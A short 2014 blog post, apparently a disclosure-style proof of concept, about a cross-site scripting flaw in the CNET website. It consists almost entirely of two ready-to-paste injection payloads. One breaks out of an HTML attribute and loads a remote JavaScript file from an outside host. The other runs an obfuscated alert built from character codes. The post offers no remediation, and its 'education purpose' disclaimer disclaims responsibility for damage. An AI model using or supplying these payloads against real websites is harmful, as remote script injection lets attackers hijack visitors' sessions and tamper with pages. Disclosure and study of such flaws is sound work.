Brazilian Security Researcher Found XSS in CNET Website [#POC]


XSS IN CNET Payload are as follows:

Injected payload: "><script src=http://yourjavascript.com/4111219525/sechaha.js></script>


Injected payload 2: 
"><script>alert(String.fromCharCode(35, 79, 119, 78, 101, 68, 32, 98, 89, 32, 83, 101, 99, 117, 114, 105, 116, 121))</script>


Disclaimer: This payload is only education purpose. We are not responsible for any kind of damage.

About The Author:
Erick Andrade, studied at the Federal University GIS Data Android Mobile Development
PHP / SQL,  Analyst in Information Security in Brazil.
11 Jun 2014

Post a Comment

Emoticon
:) :)) ;(( :-) =)) ;( ;-( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ $-) (b) (f) x-) (k) (h) (c) cheer
Click to see the code!
To insert emoticon you must added at least one space before the code.

 
Top

Nhận xét mới đăng tải!

Loading…
X